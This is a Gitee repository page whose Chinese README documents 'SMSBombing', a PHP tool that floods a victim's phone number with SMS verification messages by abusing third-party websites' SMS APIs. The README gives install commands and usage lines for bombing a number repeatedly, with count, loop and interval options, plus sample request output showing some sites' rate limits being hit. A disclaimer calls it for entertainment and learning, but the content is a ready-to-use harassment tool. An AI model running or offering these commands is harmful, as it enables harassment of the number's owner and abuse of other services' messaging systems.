1 Star 3 Fork 4

codervibe/SMSBombing

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
克隆/下载
贡献代码
同步代码
取消
提示: 由于 Git 不支持空文件夾,创建文件夹后会生成空的 .keep 文件
Loading...
README
MIT

SMSBombing

Auth GitHub Pull Requests GitHub forks Github latest release GitHub Tag HitCount Static Badge GitHub license

[!NOTE]
基础框架已提供,如需添加/修改更多 api 接口,直接修改 api.json 文件,切勿重复提交相关 issue #14#11#10

[!WARNING] 版本 v2.1.0 之后默认使用 url 获取 api.json, 如果需要使用指定 api.json 请使用版本 v2.1.1 或更高版本。

EX:

sms-bombing 176xxxxxxxx -f ./api.json

Requirement

  • PHP >= 8.1

Install

[!NOTE]
以下三种方法使用任意一种方法安装都可以,并不是三种方法全部执行!!!

以下三种方法使用任意一种方法安装都可以,并不是三种方法全部执行!!!

以下三种方法使用任意一种方法安装都可以,并不是三种方法全部执行!!!

重要的事情说三遍。

方法一、直接下载 sms-bombing 可执行文件

curl 'https://mirror.ghproxy.com/https://raw.githubusercontent.com/xiaoxuan6/SMSBombing/v2/builds/sms-bombing' -o sms-bombing --progress-bar
chmod +x sms-bombing

# linux 下执行
mv sms-bombing /usr/local/bin/sms-bombing

# win 下使用 ./smsbombing ,否则报错:command not found

方法二、通过 Composer 安装

composer global require james.xue/sms-bombing

方法三、Docker

sms-bombing

Use

普通轰炸(默认 10 次)

sms-bombing 136xxxxxxxx

全量轰炸

sms-bombing 136xxxxxxxx --num=all

启动 5 次,轰炸一个人的手机号(136xxxxxx)

sms-bombing 136xxxxxxxx --num=5

启动 5 次,轰炸一个人的手机号(136xxxxxx), 启动循环轰炸, 轮番轰炸2次

sms-bombing 136xxxxxxxx --num=5 -l 2

启动 5 次,轰炸一个人的手机号(136xxxxxx), 启动循环轰炸, 轮番轰炸2次,循环间隔30秒

sms-bombing 136xxxxxxxx --num=5 -l 2 -i 30
轰炸效果
sms-bombing 136xxxxxxxx -l 2
索引:3 请求结果:{"resultCode": 2009, "message": "phone_format_error", "data": null, "redirectUrl": null}
索引:4 请求结果:{"code":"3","codeInfo":" permission deny"}
索引:0 请求结果:{"code":65,"desc":"访问太频繁"}
索引:2 请求结果:{"success":false,"msg":"操作过于频繁,请稍后再试","data":[]}
索引:1 请求结果:
索引:7 请求结果:0
索引:6 请求结果:success
索引:8 请求结果:
索引:9 请求结果:1
索引:5 请求结果:{"code":0,"msg":"success"}
索引:0 请求结果:{"code":65,"desc":"访问太频繁"}
索引:4 请求结果:{"code":"3","codeInfo":" permission deny"}
索引:3 请求结果:{"resultCode": 2009, "message": "phone_format_error", "data": null, "redirectUrl": null}
索引:1 请求结果:
索引:2 请求结果:{"success":false,"msg":"操作过于频繁,请稍后再试","data":[]}
索引:7 请求结果:0
索引:6 请求结果:success
索引:5 请求结果:{"code":2701,"msg":"\u89e6\u53d1\u5206\u949f\u7ea7\u6d41\u63a7Permits:1"}
索引:9 请求结果:1
索引:8 请求结果:
索引:4 请求结果:{"code":"3","codeInfo":" permission deny"}
索引:0 请求结果:{"code":65,"desc":"访问太频繁"}
索引:3 请求结果:{"resultCode": 2009, "message": "phone_format_error", "data": null, "redirectUrl": null}
索引:1 请求结果:
索引:2 请求结果:{"success":false,"msg":"操作过于频繁,请稍后再试","data":[]}
索引:6 请求结果:success
索引:7 请求结果:0
索引:5 请求结果:{"code":2701,"msg":"\u89e6\u53d1\u5206\u949f\u7ea7\u6d41\u63a7Permits:1"}
索引:9 请求结果:1

Changelog

Please see CHANGELOG for more information on what has changed recently.

捐赠

如果此项目对您有帮助,还希望您捐赠支持,让我能好好的一直坚持下去。金额不在于多少,一份心意就好!在此感谢所有的捐赠者,你们的鼓励是我最大的动力!

    

Stargazers over time

Stargazers over time

License

The MIT License (MIT). Please see License File for more information.

免责声明

1、若使用者滥用本项目,本人 无需承担 任何法律责任. 本程序仅供娱乐,源码全部开源,禁止滥用 和二次 贩卖盈利. 禁止用于商业用途.

2、本项目仅做学习使用,如果使用到您的网站,您不满意,请联系我删除。

MIT License Copyright (c) 2023 xiaoxuan6 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

简介

暂无描述 展开 收起
README
MIT
取消

发行版

暂无发行版

贡献者

全部

近期动态

不能加载更多了
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/codevibe/SMSBombing.git
git@gitee.com:codevibe/SMSBombing.git
codevibe
SMSBombing
SMSBombing
v2

搜索帮助